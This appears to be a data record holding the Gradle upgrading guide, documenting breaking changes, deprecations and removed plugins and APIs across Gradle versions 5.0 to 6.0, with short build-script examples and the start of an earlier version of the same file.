visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated, use `validatePlugins` instead.\n The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. 
Use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. 
A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n `embedded-kotlin`\n}\n\nrepositories {\n jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use; however, they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior led to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. 
by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate` and emits a deprecation warning. This scenario will become an error in Gradle 7.0.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been 
removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` can no longer inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle's up-to-date checks and build cache lookups\nto use different values from those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. 
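They are now honored; for illustration, here is a minimal, hypothetical sketch of wiring a producer task's output into another task's `@Input` property (the task types, names and file paths are made up for this example, not taken from the Gradle manual):\n\n```\nclass Producer extends DefaultTask {\n @OutputFile\n final RegularFileProperty outputFile = project.objects.fileProperty()\n\n @TaskAction\n void produce() {\n def file = outputFile.get().asFile\n file.parentFile.mkdirs()\n file.text = 'payload'\n }\n}\n\nclass Consumer extends DefaultTask {\n @Input\n final Property<String> message = project.objects.property(String)\n\n @TaskAction\n void consume() { println message.get() }\n}\n\ndef producer = tasks.register('producer', Producer) {\n outputFile = layout.buildDirectory.file('out.txt')\n}\n\ntasks.register('consumer', Consumer) {\n \/\/ Mapping the producer's output into this @Input property now also\n \/\/ carries the dependency on 'producer'; no explicit dependsOn is needed.\n message = producer.flatMap { it.outputFile }.map { it.asFile.text }\n}\n```\n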
As a result, it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property (a short sketch appears a few paragraphs below).\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy (e.g. `CompileOnlyCopy2`).\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. 
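Returning to the `Property` convention change above, a minimal sketch of the new `set(null)` behaviour (the property and values are illustrative):\n\n```\ndef prop = project.objects.property(String)\nprop.convention('from-convention')\n\nprop.set('explicit')\nprintln prop.get() \/\/ prints 'explicit'\n\nprop.set(null) \/\/ no longer resets the property to 'not defined'\nprintln prop.get() \/\/ falls back to the convention: prints 'from-convention'\n```\n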
This classpath filtering change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n==== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes; a sketch of the new DSL appears further below. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebug()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n==== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two builds' build scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. 
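Returning to the `JavaExec` debug change in the 5.6 notes above, a sketch of the new `debugOptions` DSL (the task name and main class are illustrative, and the `java` plugin is assumed to be applied):\n\n```\ntask runApp(type: JavaExec) {\n classpath = sourceSets.main.runtimeClasspath\n main = 'com.example.Main' \/\/ hypothetical main class\n debugOptions {\n  enabled = true\n  port = 5005\n  server = true\n  suspend = true\n }\n}\n```\n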
The deduplication may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified, i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, produce a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. 
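For illustration, here is a hypothetical `PROCESS`-isolated work item that probes `java.class.path` (the class, task and configuration names are made up; note that the 5.6 notes above deprecate `submit()` itself in favour of `processIsolation()`):\n\n```\nimport javax.inject.Inject\n\nclass ClasspathProbe implements Runnable {\n private final String label\n\n @Inject\n ClasspathProbe(String label) { this.label = label }\n\n void run() {\n  \/\/ Prints only Gradle's minimal infrastructure classpath now, plus\n  \/\/ whatever the build explicitly put on the worker classpath.\n  println \"$label: ${System.getProperty('java.class.path')}\"\n }\n}\n\nclass ProbeTask extends DefaultTask {\n private final org.gradle.workers.WorkerExecutor workerExecutor\n\n @Inject\n ProbeTask(org.gradle.workers.WorkerExecutor workerExecutor) {\n  this.workerExecutor = workerExecutor\n }\n\n @TaskAction\n void probe() {\n  workerExecutor.submit(ClasspathProbe) { config ->\n   config.isolationMode = org.gradle.workers.IsolationMode.PROCESS\n   config.params('probe')\n   \/\/ Dependencies the action needs must be listed explicitly;\n   \/\/ they no longer leak from Gradle's own classpath.\n   config.classpath(project.configurations.probeDeps)\n  }\n }\n}\n\ntasks.register('probeWorkerClasspath', ProbeTask)\n```\n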
Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affects the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can work around it by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do 
not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. 
Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follows the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions is no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","old_contents":"\/\/ Copyright 2019 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of 
Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other sources sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output 